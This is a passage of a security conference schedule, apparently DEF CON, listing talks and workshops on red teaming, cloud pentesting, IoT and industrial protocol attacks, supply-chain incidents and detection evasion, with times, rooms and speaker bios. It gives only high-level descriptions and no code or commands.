Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 15:00-16:50 PDT


Title: Mythic, Ghostwriter, Nemesis, and Tying the Room Together: The Dude's Guide to Red Team Operations
When: Saturday, Aug 9, 15:00 - 16:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Tactics 2 - Map

Description:

Operating with modern red team tools has a lot of ins, a lotta outs, a lotta what-have-yous. If you were like me before operating with tools like Mythic, managing your projects with Ghostwriter, and analyzing your data automatically with Nemesis, you were probably living in the past and piecing things together manually, writing things down in a tedious, un-zen lack-of-system that would leave you scrambling at the end of testing, when your report should be about to go to a peer review or QA.

You might be saying, "But Michael, I like doing things manually and wasting mine and my client's time." Yeah, well, you know, that's just, like, your opinion, man.

That is entering a world of pain. I don't know about you, but when that's happening, I feel really out of my element.

Luckily, Mythic, Ghostwriter, and Nemesis really tie the room together and are a huge quality-of-life boost. No more will you say to yourself, "This aggressor script will not stand, man!" Sometimes the bear eats you, but it's high time you eat the bear.

Get ready to be bowled away by a modern approach to managing your red team operations with tools like Mythic, Ghostwriter, and Nemesis (or whatever else you can think of to plug into these tools' APIs if you're note into the whole brevity thing) to streamline your workflow.

You might get so excited that you'll flail your arms around in joy - but be careful man, there's a beverage here!

SpeakerBio:  Michael Donley

Michael is an Adversary Simulation Consultant at SpecterOps, where he deals in testing all the things - networks, web apps, Kubernetes clusters, humans, physical sites, and especially the potency of energy drinks.

He is the Director of Volunteers for the Red Team Village and loves helping people new to the field (especially career changers) find their foothold in the infosec industry.

When he's not hacking stuff or learning about new things, he is a drummer for just about any improv show in Chicago that has music in it.


Return to Index    -    Add to Google    -    ics Calendar file

MHV - Saturday - 10:30-10:59 PDT


Title: Navigating the Invisible
When: Saturday, Aug 9, 10:30 - 10:59 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

The maritime domain's vastness often masks hidden threats. This talk explores leveraging Open-Source Intelligence (OSINT) to enhance maritime security. We'll demonstrate practical, low-cost methods to gather and analyze publicly available data – including vessel tracking, port data, and social media – for identifying anomalous behaviors and predicting potential cyber-physical risks. Attendees will learn actionable techniques to build a proactive threat intelligence picture without specialized tools, providing crucial insights for defenders in this critical sector

Speakers:Mehmet Önder Key,Furkan Aydogan

SpeakerBio:  Mehmet Önder Key, Self

Önder Key is a cybersecurity consultant specializing in critical infrastructure security, zero-day vulnerability analysis, and offensive security. He has advised organizations in high-security sectors such as defense, aerospace, and finance, with hands-on experience in both red teaming and strategic security engineering. His work has been featured across numerous countries and platforms, contributing to the discovery of systemic vulnerabilities. Currently, he provides consultancy to Burkut, Ogrit, Ravenailabs and continues to advance the global offensive security ecosystem by challenging traditional approaches to cybersecurity.

SpeakerBio:  Furkan Aydogan, UNCW

Dr. Aydogan is an Assistant Professor of Computer Science at UNCW and a researcher in cybersecurity, digital forensics, and brainwave-based encryption systems. His Ph.D. focused on using EEG signals to secure IoT devices—blending neuroscience with cryptography. He’s a two-time award winner for research in VANET security and cognitive encryption.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 14:00-14:45 PDT


Title: Nebula - 4 Years and Still Kicking *aaS
When: Friday, Aug 8, 14:00 - 14:45 PDT
Where: LVCCWest-Level2-W210 - Map

Description:

Cloud penetration testing has become a hot topic in the offensive community, as cloud-based infrastructures have been slowly taking the place on-prem ones used to have. This requires a tool to help with it. Nebula is a cloud pentest framework, which offers reconnaissance, enumeration, exploitation, post exploitation on AWS, Azure, DigitalOcean, and above all opportunity to extend even more. It is built modularly for each provider and each attack, allowing for diversity in attack surface. This coupled with the client-server architecture allows for a collaborated team assessment of a hybrid cloud environment.

SpeakerBio:  Bleon "Gl4ssesbo1" Proko

Bleon is an infosec passionate about infrastructure penetration testing and security, including Active Directory, cloud (AWS, Azure, GCP, Digital Ocean), hybrid infrastructures, as well as defense, detection, and threat hunting. He has presented topics related to cloud penetration testing and security at conferences like Black Hat USA, Europe, and Sector, DEF CON, SANS Pentest Hackfest Hollywood and Amsterdam, as well as several BSides in the USA and Europe. His research includes Nebula, a cloud penetration testing framework and other blogs, which you can also find on his blog; blog.pepperclipp.com. He is also the author of YetiHunter and DetentionDodger; github.com/permiso-io-tools. He is also the author of the upcoming book Deep Dive into Clouded Waters: An Overview in Digital Ocean's Pentest and Security; leanpub.com/deep-dive-into-clouded-waters-an-overview-in-digitaloceans-pentest-and-security.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 13:00-13:45 PDT


Title: Nebula - 4 Years and Still Kicking *aaS
When: Saturday, Aug 9, 13:00 - 13:45 PDT
Where: LVCCWest-Level2-W211 - Map

Description:

Cloud penetration testing has become a hot topic in the offensive community, as cloud-based infrastructures have been slowly taking the place on-prem ones used to have. This requires a tool to help with it. Nebula is a cloud pentest framework, which offers reconnaissance, enumeration, exploitation, post exploitation on AWS, Azure, DigitalOcean, and above all opportunity to extend even more. It is built modularly for each provider and each attack, allowing for diversity in attack surface. This coupled with the client-server architecture allows for a collaborated team assessment of a hybrid cloud environment.

SpeakerBio:  Bleon "Gl4ssesbo1" Proko

Bleon is an infosec passionate about infrastructure penetration testing and security, including Active Directory, cloud (AWS, Azure, GCP, Digital Ocean), hybrid infrastructures, as well as defense, detection, and threat hunting. He has presented topics related to cloud penetration testing and security at conferences like Black Hat USA, Europe, and Sector, DEF CON, SANS Pentest Hackfest Hollywood and Amsterdam, as well as several BSides in the USA and Europe. His research includes Nebula, a cloud penetration testing framework and other blogs, which you can also find on his blog; blog.pepperclipp.com. He is also the author of YetiHunter and DetentionDodger; github.com/permiso-io-tools. He is also the author of the upcoming book Deep Dive into Clouded Waters: An Overview in Digital Ocean's Pentest and Security; leanpub.com/deep-dive-into-clouded-waters-an-overview-in-digitaloceans-pentest-and-security.


Return to Index    -    Add to Google    -    ics Calendar file

PAYV - Friday - 16:00-16:30 PDT


Title: Network tokens
When: Friday, Aug 8, 16:00 - 16:30 PDT
Where: LVCCWest-Level1-Hall2-W505 - Map

Description:

Why network tokens are more secure than PAN

SpeakerBio:  Sanjeev Sharma
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

IOTV - Friday - 11:45-12:30 PDT


Title: Never enough about cameras - The firmware encryption keys hidden under the rug
When: Friday, Aug 8, 11:45 - 12:30 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

This talk covers RCEs on multiple popular Dahua perimeter cameras with a potential resounding impact on retail, banking, traffic and other infrastructure

SpeakerBio:  Alexandru Lazar, Security Researcher at Bitdefender
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

IOTV - Saturday - 11:00-11:59 PDT


Title: No Brain No Gain
When: Saturday, Aug 9, 11:00 - 11:59 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

Traditional digital security often falls short when applied to IoT environments, where devices are limited in processing power and exposed to a wider range of threats. Human vulnerabilities—especially against deepfake-style attacks—further weaken current systems. Static biometrics like fingerprints or facial scans are no longer enough. This work proposes a new direction: using the brain’s unique electrical activity (EEG signals) as a security layer. These dynamic, hard-to-replicate patterns offer a way to authenticate users without storing sensitive data or relying on heavy computation. By grounding trust in the user’s own biological signals, this approach offers a lightweight, resilient solution tailored to the constraints of modern IoT devices.

Speakers:Mehmet Önder Key,Temel Demir,Dr. Ahmet Furkan Aydogan

SpeakerBio:  Mehmet Önder Key, Self

Önder Key is a cybersecurity consultant specializing in critical infrastructure security, zero-day vulnerability analysis, and offensive security. He has advised organizations in high-security sectors such as defense, aerospace, and finance, with hands-on experience in both red teaming and strategic security engineering. His work has been featured across numerous countries and platforms, contributing to the discovery of systemic vulnerabilities. Currently, he provides consultancy to Burkut, Ogrit, Ravenailabs and continues to advance the global offensive security ecosystem by challenging traditional approaches to cybersecurity.

SpeakerBio:  Temel Demir, Cybersecurity Lead at KPMG
No BIO available
SpeakerBio:  Dr. Ahmet Furkan Aydogan, Assistant Professor of Computer Science at UNCW
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 10:30-11:15 PDT


Title: No VPN Needed? Cryptographic Attacks Against the OPC UA Protocol
When: Friday, Aug 8, 10:30 - 11:15 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

OPC UA is a standardized communication protocol that is widely used in the areas of industrial automation and IoT. It is used within and between OT networks, but also as a bridge between IT and OT environments or to connect field systems with the cloud. Traditionally, VPN tunnels are used to secure connections between OT trust zones (especially when they cross the internet), but this is often considered not to be neccessary when using OPC UA because the protocol offers its own cryptographic authentication and transport security layer.

This makes OPC UA a valuable target for attackers, because if they could hijack an OPC UA server they might be able to wreak havoc on whatever industrial systems are controlled by it.

I decided to take a look at the cryptography used by the protocol, and managed to identify two protocol flaws which I could turn into practical authentication bypass attacks that worked against various implementations and configurations. These attacks involve signing oracles, signature spoofing padding oracles and turning "RSA-ECB" into a "timing side channel amplifier".

In this talk, I will explore the protocols and the issues I identified, as well as the process of turning two theoretical crypto flaws into highly practical exploits.

References:

SpeakerBio:  Tom Tervoort

Tom Tervoort is a Principal Security Specialist for Secura, a security company based in the Netherlands. Tom regularly performs network pentests, web/mobile application assessments, as well as code, configuration and design reviews for large Dutch companies and institutions. Tom's primary areas of interest include cryptographic protocols and cryptography engineering, advanced web attacks and Windows AD pentesting. Besides doing security assessments, Tom also develops and gives cryptography and secure programming courses to software developers. In December 2020, Tom won a Pwnie award for Best Cryptographic Attack, due to his discovery of the Zerologon vulnerability. Tom has spoken at various conferences, including Black Hat USA 2021 and 2023, Black Hat Europe 2022 and ONE Conference 2021.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Saturday - 17:50-18:20 PDT


Title: NO-HAVOC today, NO-HAVOC tomorrow
When: Saturday, Aug 9, 17:50 - 18:20 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
Speakers:Lena "LambdaMamba" Yu,Samuel Gasparro,Daniel Ward

SpeakerBio:  Lena "LambdaMamba" Yu, CEO at World Cyber Health
No BIO available
SpeakerBio:  Samuel Gasparro
No BIO available
SpeakerBio:  Daniel Ward
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MWV - Friday - 15:10-15:40 PDT


Title: North Korea's Fur Shop: Poaching for Otters, Beavers, Ferrets and Capybaras
When: Friday, Aug 8, 15:10 - 15:40 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
Speakers:Mauro Eldritch,José Gómez

SpeakerBio:  Mauro Eldritch
No BIO available
SpeakerBio:  José Gómez
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 12:00-12:45 PDT


Title: Not Just a Pipeline Leak: Reconstructing the Real Attack Behind tj-actions
When: Saturday, Aug 9, 12:00 - 12:45 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

Every once in a while, we get a grim reminder that the open-source trust model that enables developers to use each other’s code and resources can be abused by attackers.

GitHub users recently suffered from such a wake-up call. In March 2025, the highly-publicized "tj-actions" incident came to light, throwing many GitHub organizations and users into panic, as their credentials were leaked via their supply chain. But while the masses were scared about the massive credential exposure, we were able to piece together evidence to show that the leakage wasn't the primary goal of this attack, and that the initial buzz was just the tip of the iceberg. Our investigations indicate that more highly-popular projects were targeted as part of this campaign, and DefCon will be the first place that we reveal the newly-discovered details.

We’ll reveal how the attack began months earlier than initially believed, with the attacker compromising multiple open-source projects utilizing them for lateral movement. We'll detail how the adversary maintained a low profile, patiently waiting to spear-target Coinbase. We will dissect the sophisticated evasion techniques employed and the attacker’s modus operandi, showing how the open-source access and trust model were weaponized to deliver a precise and calculated supply chain attack.

References:

SpeakerBio:  Aviad Hahami

Security researcher and experienced software engineer with a great passion for algorithms (graph-theory specifically), security research (vulnerability research, bug bounties), chaos engineering (YES!), frontends, backends, web services, systems architecture, infras, clouds(making them rain), and more :) Today, researching at Palo Alto Networks. Oh yea I also DJ


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 13:00-13:45 PDT


Title: nRootTag - Exploiting Find My and Transforming Computers Into Unauthorized Trackers
When: Saturday, Aug 9, 13:00 - 13:45 PDT
Where: LVCCWest-Level2-W212 - Map

Description:

Apple Find My is a crowdsourced offline tracking network designed to assist in recovering lost devices while maintaining privacy. By leveraging over a billion active Apple devices, it has become the world's largest device-locating network. While prior research has demonstrated the possibility of creating DIY trackers that attach to the Find My network, they are mainly for personal use and do not pose a threat for remote attacks. Recently, we found an implementation error in the Find My network that makes it vulnerable to brute-force and rainbow table attacks. With a cost of a few US dollars, the exploit turns computers into trackers without requiring root privileges. We are concerned that adversaries and intelligence agencies would find this exploit handy for user profiling, surveillance, and stalking. This demo is especially appealing to those interested in Find My network and Bluetooth tracking technologies. We will review how Find My offline finding works, elaborate in detail about our discoveries, techniques to make practical attacks, and provide source code for fun.

Speakers:Junming "Chapoly1305" Chen,Qiang Zeng

SpeakerBio:  Junming "Chapoly1305" Chen

Junming is a PhD student at George Mason University. He works on IoT security and was previously a full-time security engineer in the electric automotive industry. He has a CompTIA Security+ certificate like everybody. He supports the Rizin Reverse Engineering Framework. This will be his first time presenting at DEF CON.

SpeakerBio:  Qiang Zeng

Qiang received his bachelor's and master's degrees from Beihang University and his PhD degree from Penn State University. He is an associate professor in the Department of Computer Science with George Mason University. He is the recipient of an NSF CAREER Award. His main research interest is computer systems security, with a focus on cyber-physical systems, Internet of Things, and mobile computing. He also works on adversarial machine learning.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 14:00-14:45 PDT


Title: nRootTag - Exploiting Find My and Transforming Computers Into Unauthorized Trackers
When: Friday, Aug 8, 14:00 - 14:45 PDT
Where: LVCCWest-Level2-W211 - Map

Description:

Apple Find My is a crowdsourced offline tracking network designed to assist in recovering lost devices while maintaining privacy. By leveraging over a billion active Apple devices, it has become the world's largest device-locating network. While prior research has demonstrated the possibility of creating DIY trackers that attach to the Find My network, they are mainly for personal use and do not pose a threat for remote attacks. Recently, we found an implementation error in the Find My network that makes it vulnerable to brute-force and rainbow table attacks. With a cost of a few US dollars, the exploit turns computers into trackers without requiring root privileges. We are concerned that adversaries and intelligence agencies would find this exploit handy for user profiling, surveillance, and stalking. This demo is especially appealing to those interested in Find My network and Bluetooth tracking technologies. We will review how Find My offline finding works, elaborate in detail about our discoveries, techniques to make practical attacks, and provide source code for fun.

Speakers:Junming "Chapoly1305" Chen,Qiang Zeng

SpeakerBio:  Junming "Chapoly1305" Chen

Junming is a PhD student at George Mason University. He works on IoT security and was previously a full-time security engineer in the electric automotive industry. He has a CompTIA Security+ certificate like everybody. He supports the Rizin Reverse Engineering Framework. This will be his first time presenting at DEF CON.

SpeakerBio:  Qiang Zeng

Qiang received his bachelor's and master's degrees from Beihang University and his PhD degree from Penn State University. He is an associate professor in the Department of Computer Science with George Mason University. He is the recipient of an NSF CAREER Award. His main research interest is computer systems security, with a focus on cyber-physical systems, Internet of Things, and mobile computing. He also works on adversarial machine learning.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Saturday - 10:00-10:59 PDT


Title: Nuclei: Beyond The Basic Templates
When: Saturday, Aug 9, 10:00 - 10:59 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

Nuclei has become a game-changing tool for hackers worldwide, transforming how we discover vulnerabilities and hack at scale. This workshop explores why Nuclei is dominating the bug bounty scene and how it's evolving the art of automated hacking. We'll dive into how this open-source powerhouse lets hackers scan thousands of targets, write custom templates, and find bugs that automated scanners miss.

SpeakerBio:  Ben "nahamsec" Sadeghipour, Co-Founder & CEO at HackingHub

Ben Sadeghipour, better known as NahamSec, is an ethical hacker, content creator, and keynote speaker. Over his career, Ben has uncovered thousands of security vulnerabilities for major organizations, including Amazon, Apple, Zoom, Meta, Google, and the U.S. Department of Defense. As a top-ranked bug bounty hunter, he is deeply passionate about cybersecurity education, regularly sharing his knowledge through his popular YouTube channel and speaking at major conferences like DEFCON and BSides. Beyond his personal achievements, Ben is committed to building the security community, organizing events that foster collaboration, innovation, and the next generation of offensive security professionals.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Friday - 12:00-12:59 PDT


Title: Nuclei: Beyond The Basic Templates
When: Friday, Aug 8, 12:00 - 12:59 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

Nuclei has become a game-changing tool for hackers worldwide, transforming how we discover vulnerabilities and hack at scale. This workshop explores why Nuclei is dominating the bug bounty scene and how it's evolving the art of automated hacking. We'll dive into how this open-source powerhouse lets hackers scan thousands of targets, write custom templates, and find bugs that automated scanners miss.

Speakers:Ben "nahamsec" Sadeghipour,Adam "BuildHackSecure" Langley

SpeakerBio:  Ben "nahamsec" Sadeghipour, Co-Founder & CEO at HackingHub

Ben Sadeghipour, better known as NahamSec, is an ethical hacker, content creator, and keynote speaker. Over his career, Ben has uncovered thousands of security vulnerabilities for major organizations, including Amazon, Apple, Zoom, Meta, Google, and the U.S. Department of Defense. As a top-ranked bug bounty hunter, he is deeply passionate about cybersecurity education, regularly sharing his knowledge through his popular YouTube channel and speaking at major conferences like DEFCON and BSides. Beyond his personal achievements, Ben is committed to building the security community, organizing events that foster collaboration, innovation, and the next generation of offensive security professionals.

SpeakerBio:  Adam "BuildHackSecure" Langley, CTO at HackingHub

For over 20 years, Adam has balanced the worlds of application security and web development. He currently serves as the CTO of HackingHub and the Director of BSides Exeter. Over the past five years, he has combined his expertise to create and deliver gamified educational content, aimed at teaching the next generation of ethical hackers and developers about web application security.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 14:00-14:45 PDT


Title: OAuthSeeker
When: Friday, Aug 8, 14:00 - 14:45 PDT
Where: LVCCWest-Level2-W212 - Map

Description:

OAuthSeeker is a cutting-edge red team tool designed to simulate OAuth phishing attacks, specifically targeting Microsoft Azure and Office365 users. This tool facilitates the creation, management, and execution of phishing campaigns without requiring advanced technical skills. By leveraging malicious OAuth applications, OAuthSeeker allows offensive security engineers to perform targeted phishing attacks to compromise user identities and gain access to Microsoft Graph API and Azure resources. With features like an administrative control panel, token refresh capabilities, and customizable skins for user-facing components, OAuthSeeker provides an effective solution for testing security defenses against a common but often overlooked attack vector. The tool is easy to deploy with only a single pre-compiled Go binary with zero external dependencies and includes built-in support for LetsEncrypt. The documentation is highly detailed and outlines all the possible attack paths where this capability could be used during real-world red team engagements. The installation process is streamlined requiring only a single command to deploy a new instance of the application.

SpeakerBio:  Adam "UNC1739" Crosser, Staff Security Engineer at Praetorian

Adam Crosser is a Staff Security Engineer at Praetorian, specializing in offensive security research and tooling development. He began his career in red team operations, honing his skills in adversary simulation and advanced attack techniques. Now part of the Praetorian Labs team, Adam focuses on vulnerability research, exploit development, and building custom offensive security capabilities to support red team engagements—pushing the boundaries of adversary tradecraft.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 14:00-14:45 PDT


Title: OAuthSeeker
When: Saturday, Aug 9, 14:00 - 14:45 PDT
Where: LVCCWest-Level2-W208 - Map

Description:

OAuthSeeker is a cutting-edge red team tool designed to simulate OAuth phishing attacks, specifically targeting Microsoft Azure and Office365 users. This tool facilitates the creation, management, and execution of phishing campaigns without requiring advanced technical skills. By leveraging malicious OAuth applications, OAuthSeeker allows offensive security engineers to perform targeted phishing attacks to compromise user identities and gain access to Microsoft Graph API and Azure resources. With features like an administrative control panel, token refresh capabilities, and customizable skins for user-facing components, OAuthSeeker provides an effective solution for testing security defenses against a common but often overlooked attack vector. The tool is easy to deploy with only a single pre-compiled Go binary with zero external dependencies and includes built-in support for LetsEncrypt. The documentation is highly detailed and outlines all the possible attack paths where this capability could be used during real-world red team engagements. The installation process is streamlined requiring only a single command to deploy a new instance of the application.

SpeakerBio:  Adam "UNC1739" Crosser, Staff Security Engineer at Praetorian

Adam Crosser is a Staff Security Engineer at Praetorian, specializing in offensive security research and tooling development. He began his career in red team operations, honing his skills in adversary simulation and advanced attack techniques. Now part of the Praetorian Labs team, Adam focuses on vulnerability research, exploit development, and building custom offensive security capabilities to support red team engagements—pushing the boundaries of adversary tradecraft.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Friday - 14:00-17:59 PDT


Title: Obfuscation Reloaded: Modern Techniques for Evading Detection
When: Friday, Aug 8, 14:00 - 17:59 PDT
Where: LVCCNorth-Level2-N257 - Map

Description:

As defenders evolve with more sophisticated detection strategies, red teamers must innovate to remain effective. This intermediate hands-on workshop delves into modern obfuscation techniques, bypass strategies, and OPSEC considerations that reflect the current threat landscape. Participants will explore how Microsoft's Antimalware Scan Interface (AMSI), Defender, and Event Tracing for Windows (ETW) are being leveraged by defenders and how to navigate around them.

You'll walk away with an understanding of the real-world effectiveness of techniques like string encryption, runtime compilation, sandbox evasion, and how minimalistic evasion ("least obfuscation") helps evade both machine learning and heuristic-based detections. Attendees will use PowerShell, C#, and open-source tooling to build and test evasive payloads in a lab setting.

In this workshop, attendees will: 1. Learn to identify and break static and dynamic detection signatures. 2. Employ least-obfuscation strategies and runtime evasion. 3. Build AMSI and ETW bypasses using up-to-date PowerShell and C# techniques. 4. Understand P/invoke and API hooking 5. Evaluate how defenders log and detect activity and design code to stay under the radar.

Speakers:Jake "Hubble" Krasnov,Vincent "Vinnybod" Rose,Gannon "Dorf" Gebauer,Rey "Privesc" Bango

SpeakerBio:  Jake "Hubble" Krasnov, Red Team Operations Lead and Chief Executive Officer at BC Security

Jake "Hubble" Krasnov is the Red Team Operations Lead and Chief Executive Officer of BC Security, with a distinguished career spanning engineering and cybersecurity. A U.S. Air Force veteran, Jake began his career as an Astronautical Engineer, overseeing rocket modifications, leading test and evaluation efforts for the F-22, and conducting red team operations with the 57th Information Aggressors. He later served as a Senior Manager at Boeing Phantom Works, where he focused on aviation and space defense projects. A seasoned speaker and trainer, Jake has presented at conferences including DEF CON, Black Hat, HackRedCon, HackSpaceCon, and HackMiami.

SpeakerBio:  Vincent "Vinnybod" Rose, Confluent

Vincent "Vinnybod" Rose is the Lead Developer for Empire and Starkiller. He is a software engineer with a decade of expertise in building highly scalable cloud services, improving developer operations, and automation. Recently, his focus has been on the reliability and stability of the Empire C2 server. Vinnybod has presented at Black Hat and has taught courses at DEF CON on Red Teaming and Offensive PowerShell. He currently maintains a cybersecurity blog focused on offensive security at https://www.bc-security.org/blog/.

SpeakerBio:  Gannon "Dorf" Gebauer

Gannon "Dorf" Gebauer is a Security Consultant and Tool Developer at BC Security, specializing in threat intelligence, embedded system testing, and automation for range deployments. He has led teams through CyberPatriot, the USAF CTF that challenges participants in both defensive and offensive capabilities. Gannon is also an accomplished speaker and trainer, having delivered talks and training sessions at Black Hat, DEF CON, and Texas Cyber Summit.

SpeakerBio:  Rey "Privesc" Bango, Security Consultant at BC Security

Rey "Privesc" Bango is a Principal Cloud Advocate at Microsoft and a Security Consultant specializing in red teaming at BC Security. At Microsoft, he focuses on empowering organizations to leverage transformative technologies such as Artificial Intelligence and Machine Learning, prioritizing trust, security, and responsible use. He is an experienced trainer and speaker, presenting and teaching at cybersecurity conferences, including Black Hat and DEF CON. His work continues to bridge the gap between cutting-edge technological advancements and the critical need for secure, ethical implementation in today's world.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Saturday - 14:00-15:50 PDT


Title: Oblivious Access to Blockchains
When: Saturday, Aug 9, 14:00 - 15:50 PDT
Where: LVCCWest-Level1-Hall4-Communities-C101 - Map

Description:

Accesses to the blockchain's state and logs leak highly sensitive information such as the user's identity, who it is trading with, and which crypto-asset the user is interested in trading. In this tutorial, we will go over two technologies for ensuring access pattern privacy, including Oblivious RAM (ORAM), and Private Information Retrieval (PIR). Unlike traditional encrypted databases that protect only the contents of data, our technologies additionally protect the queries, thus hiding users' intentions. We will describe two extremely simple constructions, one ORAM, and one PIR scheme. In particular, the ORAM algorithm is also the one used by industry leaders such as Signal and Meta. We will next show a demo for our oblivious key-value store implementation. We will also challenge the learners with a CTF problem that demonstrates how sensitive secrets can easily be leaked even when the memory contents are encrypted.

Speakers:Elaine Shi,Afonso Tinoco

SpeakerBio:  Elaine Shi, Professor at Carnegie Mellon University

Elaine Shi is a Packard Fellow, Sloan Fellow, ACM Fellow, and IACR Fellow. A Professor with a joint appointment in CSD and ECE at Carnegie Mellon University, Elaine is also an Adjunct Professor of Computer Science at the University of Maryland. Her research interests include cryptography, security, mechanism design, algorithms, foundations of blockchains, and programming languages. Elain is a co-founder of Oblivious Labs, Inc. My research on Oblivious RAM and differentially private algorithms have been adopted by Signal, Meta, and Google.

SpeakerBio:  Afonso Tinoco

Afonso Tinoco is a PhD candidate currently on leave from Carnegie Mellon University and University of Lisbon. His research interests include Applied Cryptography and Distributed System Verification. He is a Co-Founder and a Research Engineer at Oblivious Labs, Inc. (https://obliviouslabs.com). Oblivious Lab’s mission is to develop open-source toolchains for Oblivious Computation (https://github.com/obliviouslabs/), with the goal of accelerating the wide deployment of Oblivious Computations. He is also a co-captain of STT (https://sectt.github.io/) , the CTF team of University of Lisbon.


Return to Index    -    Add to Google    -    ics Calendar file

ADV - Friday - 17:00-17:30 PDT


Title: Of Stochastic Parrots and Deterministic Predators: Decision-Making in Adversarial Automation
When: Friday, Aug 8, 17:00 - 17:30 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

In an era where AI systems oscillate between mimicking human-like randomness and executing precise, predatory strategies, understanding decision-making in adversarial automation is critical. This talk explores the tension between "stochastic parrots"; generative models that produce probabilistic outputs, and "deterministic predators," systems designed to behave in a predictable pattern in adversarial settings. We will delve into the mechanics of decision-making under uncertainty, examining how these systems navigate competitive environments, from game-playing AIs to cybersecurity defenses. Attendees will gain insights into the algorithms driving these dynamics, and where the technology is heading. We will be releasing tooling around our deterministic TTP selection engine.

Speakers:Bobby Kuzma,Michael Odell

SpeakerBio:  Bobby Kuzma, Director - Offensive Cyber Operations at ProCircular

Bobby Kuzma is a seasoned offensive security researcher with a long running interest in computational decision making. He currently runs the Offensive Cyber Operations team at ProCircular.

SpeakerBio:  Michael Odell, Cyber Security Consultant

A nerd who likes playing with computers


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Friday - 14:00-14:30 PDT


Title: Off-Grid Datarunning in Oppresive Regimes: Sneakernet and Pirate Box
When: Friday, Aug 8, 14:00 - 14:30 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

Robert is a hacker and longtime Linux user and sysadmin who knows the importance of education and information sharing, and is passionate to his core about human rights issues and community outreach. He has spoken at length about Linux distros from oppressive regimes, including North Korea's Red Star OS, and understands how these regimes wish to stifle the flow of information. He is also an unashamed sharer of information, old school punk, and loves to make a good meal for his friends.

SpeakerBio:  Robert "LambdaCalculus" Menes

Robert is a hacker and longtime Linux user and sysadmin who knows the importance of education and information sharing, and is passionate to his core about human rights issues and community outreach. He has spoken at length about Linux distros from oppressive regimes, including North Korea's Red Star OS, and understands how these regimes wish to stifle the flow of information. He is also an unashamed sharer of information, old school punk, and loves to make a good meal for his friends.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Offensive Cyber Security Operations: Mastering Breach and Adversarial Attack Simulation Engagements
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

This hands-on workshop has been created to provide participants with a better understanding of offensive security operations, breach and adversary simulation engagements. The goal is to enable participants to simulate their adversaries based on the industry which their organization is in, including both known and unknown adversaries.

Participants will learn to emulate various threat-actors safely in a controlled, enterprise level environment. Also, the training will help participants learn to simulate unknown adversaries by choosing a wide variety of offensive tradecraft, TTPs and planning attack simulation engagements effectively.

All machines in the lab environment will be equipped with AV, Web proxy, EDR and other Defense systems. The training management platform will have modules/videos of each attack vector used in the lab environment and step-by-step walkthrough of the attack path. The training is intended to help the attendees to assess the defenses and evaluate the security controls deployed in their organization against motivated adversaries.

This training will provide participants access to a breach simulation lab range, where they will be able to perform a full red team-attack simulation scenario in guided mode. Each step of the attack chain will be explained, along with the TTPs used, starting from initial access to exfiltration.

SpeakerBio:  Abhijith "Abx" B R

Abhijith B R, also known by the pseudonym Abx, has more than a decade of experience in the offensive cyber security industry. He is a professional hacker, offensive cyber security specialist, red team consultant, security researcher, trainer and public speaker.

Currently, he is building Breachsimrange.io and is involved with multiple organizations as a consulting specialist to help them build offensive security operations programs, improve their current security posture, assess cyber defense systems, and bridge the gap between business leadership and security professionals.

Abhijith was responsible for building and managing offensive security operations and adversary simulation for a prominent FinTech company called Envestnet, Inc. In the past, he held the position of Deputy Manager - Cyber Security at Nissan Motor Corporation, and prior to that, he worked as a Senior Security Analyst at EY.

As the founder of Adversary Village (https://adversaryvillage.org/), Abhijith spearheads a community initiative focused on adversary simulation, adversary-tactics, purple teaming, threat actor/ransomware research-emulation, and offensive cyber security. Adversary Village is part of DEF CON Villages and organizes hacking villages at prominent events such as the DEF CON Hacking Conference, RSA Conference etc.

Abx also acts as the Lead of an official DEF CON Group named DC0471. He is actively involved in leading the Tactical Adversary project (https://tacticaladversary.io/), a personal initiative that centers around offensive cyber security, adversary attack simulation and red teaming tradecraft.

Abhijith has spoken at various hacking and cyber security conferences such as, DEF CON hacker convention – Las Vegas, RSA Conference – San Francisco, The Diana Initiative – Las Vegas, DEF CON 28 safemode - DCG Village, Opensource India, Security BSides Las Vegas, BSides San Francisco, Hack Space Con – Kennedy space center Florida, Nullcon – Goa, c0c0n – Kerala, BSides Delhi, etc.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Offensive Cyber Security Operations: Mastering Breach and Adversarial Attack Simulation Engagements
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

This hands-on workshop has been created to provide participants with a better understanding of offensive security operations, breach and adversary simulation engagements. The goal is to enable participants to simulate their adversaries based on the industry which their organization is in, including both known and unknown adversaries.

